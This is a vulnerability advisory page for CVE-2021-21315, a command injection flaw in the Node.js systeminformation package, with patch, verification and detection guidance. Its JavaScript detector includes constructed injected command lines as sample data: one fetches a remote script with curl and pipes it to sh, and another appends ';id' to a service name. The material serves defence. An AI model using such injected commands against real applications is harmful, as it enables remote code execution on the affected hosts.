CVE-2021-21315

7.1 HIGH

📋 TL;DR

CVE-2021-21315 is a command injection vulnerability in the systeminformation npm package, a Node.js library applications use to query hardware, OS, network and process details. Four functions, si.inetLatency(), si.inetChecksite(), si.services() and si.processLoad(), build shell commands from their parameters; versions before 5.3.1 only sanitized string parameters, so a value of another type (an array or object) carrying shell syntax reached the shell unchanged. An attacker who controls the input an application passes to one of these functions can execute arbitrary commands with the privileges of the Node.js process.

💻 Affected Systems

Products:
  • systeminformation npm package
Versions: All versions before 5.3.1
Operating Systems: All platforms where Node.js runs
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitable only where the application passes untrusted input to si.inetLatency(), si.inetChecksite(), si.services() or si.processLoad(). Applications that call these functions with fixed, application-defined values are not reachable by an attacker.

📦 What is this software?

systeminformation is a Node.js library, published on npm, that applications use to read system details (CPU, memory, disks, network interfaces, processes and services) on the host they run on. Several of its functions gather this information by shelling out to operating-system utilities.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full remote code execution leading to complete system compromise, data theft, and lateral movement within the network.

🟠

Likely Case

Arbitrary command execution with the privileges of the Node.js process, typically allowing file system access, data exfiltration, installation of a reverse shell, or further exploitation from the application host.

🟢

If Mitigated

No impact if input validation/sanitization is properly implemented or if vulnerable functions aren't used with untrusted input.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the application to call one of the vulnerable functions with attacker-controlled input (for example a hostname or URL taken from a request). Whether that input is reachable without authentication depends on the application, not the library. Public proof-of-concept code is linked from the advisory references.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.3.1

Vendor Advisory: https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v

Restart Required: Yes

Instructions:

1. Raise the version range in package.json to 5.3.1 or higher (for example "systeminformation": "^5.3.1"). Note that 'npm update' only moves within the range already declared in package.json, so an older major range such as ^4.x will not be updated by it.
2. Run 'npm install systeminformation@^5.3.1', which updates both package.json and the lockfile; then run 'npm ls systeminformation' to confirm that no nested (transitive) copy below 5.3.1 remains.
3. Restart all Node.js applications using this package.

🔧 Temporary Workarounds

Input validation and sanitization (applies to all platforms)

Before calling any of the four affected functions, check that each parameter is a plain string; reject arrays, objects and anything else. Restrict the string to the characters a hostname, URL or service name legitimately needs, so that shell metacharacters such as ;, |, &, $( and backticks never reach the call.

🧯 If You Can't Patch

  • Implement strict input validation for all parameters passed to si.inetLatency(), si.inetChecksite(), si.services() and si.processLoad(): accept only plain strings that match an allowlist for the expected value type (hostname, URL or service name)
  • Avoid calling these functions with any user-controlled or untrusted input; where possible pass only fixed values defined in application code

🔍 How to Verify

Check if Vulnerable:

package.json only declares a version range; the installed version is the "version" field in node_modules/systeminformation/package.json (and the resolved entry in package-lock.json). Any installed copy below 5.3.1, including a nested copy pulled in by another dependency, is vulnerable.

Check Version:

npm list systeminformation

Verify Fix Applied:

Confirm that every copy listed by 'npm ls systeminformation' (top-level and nested) is 5.3.1 or higher, and that package-lock.json resolves to that version so a fresh 'npm ci' does not reinstall an older one.

📡 Detection & Monitoring

Log Indicators:

  • A node process spawning a shell (sh -c on Linux/macOS) whose command line combines one of the utilities these functions shell out to (ping, curl, ps, systemctl) with shell metacharacters such as $(, backticks, ;, | or &&
  • Application logs showing hostnames, URLs or service names containing those metacharacters being passed to si.inetLatency(), si.inetChecksite(), si.services() or si.processLoad()

Network Indicators:

  • Unexpected outbound connections from Node.js applications
  • DNS requests to suspicious domains from application processes

SIEM Query:

process.parent.name:node AND process.name:(sh OR bash OR dash) AND process.command_line:(*ping* OR *curl* OR *systemctl* OR *ps*) AND process.command_line:(*$(* OR *`* OR *;* OR *|* OR *&&*)

The library's function names (inetLatency, inetChecksite) never appear on a process command line, so a query matching on them returns nothing; match instead on the shell the vulnerable code spawns from node and on shell syntax in its arguments. Adapt field names and wildcard escaping to your SIEM, and expect tuning: legitimate Node.js scripts that run shell pipelines will also match the metacharacter clause.
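The detection logic above run over constructed process-creation events, as an added example for this page (not from the advisory or the library). The event schema (parent_name, name, command_line) and the sample events are assumptions: map the fields to whatever your EDR or auditd pipeline emits.

```javascript
// Added example: detector for node -> shell spawns carrying shell syntax,
// the process pattern produced when a vulnerable systeminformation call is
// fed injected input. Field names are illustrative, not a specific product's.

// Constructed events. Event 1 and 3 simulate injection; 203.0.113.5 is a
// documentation (TEST-NET-3) address, not a real indicator.
const SAMPLE_EVENTS = [
  { parent_name: 'node', name: 'sh', command_line: 'sh -c ping -c 2 -w 3 8.8.8.8' },
  { parent_name: 'node', name: 'sh', command_line: 'sh -c ping -c 2 -w 3 8.8.8.8,$(curl http://203.0.113.5/x | sh)' },
  { parent_name: 'cron', name: 'sh', command_line: 'sh -c ps aux | grep backup' },
  { parent_name: 'node', name: 'sh', command_line: 'sh -c systemctl show nginx.service;id' },
  { parent_name: 'node', name: 'git', command_line: 'git status' },
];

// Shells child_process.exec() uses on POSIX hosts (assumption: extend for
// cmd.exe / powershell.exe on Windows).
const SHELLS = new Set(['sh', 'bash', 'dash', 'zsh']);

// Utilities the four vulnerable functions shell out to on Linux.
const EXPECTED_TOOLS = /\b(ping|curl|systemctl|ps)\b/;

// Shell syntax that a hostname, URL or service name never needs.
const SHELL_META = /\$\(|`|;|\|\||&&|\|/;

// Returns an alert record for a suspicious event, or null.
function classify(event) {
  if (event.parent_name !== 'node' || !SHELLS.has(event.name)) return null;
  if (!EXPECTED_TOOLS.test(event.command_line)) return null;
  const meta = event.command_line.match(SHELL_META);
  if (!meta) return null;
  return { command_line: event.command_line, metachar: meta[0] };
}

// Runs classify over a batch and returns the alerts with their event index.
function detect(events) {
  const alerts = [];
  events.forEach((event, index) => {
    const alert = classify(event);
    if (alert) alerts.push({ index, ...alert });
  });
  return alerts;
}

module.exports = { SAMPLE_EVENTS, classify, detect };
```

Run against SAMPLE_EVENTS, detect() flags events 1 and 3 only: the plain ping, the cron-spawned ps pipeline and the git child are ignored because they either lack a node parent or carry no shell metacharacter. The metachar clause is the noisy part; in environments where node legitimately runs pipelines, narrow it to $( and backticks, or correlate with a follow-on child process that is not the expected utility.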
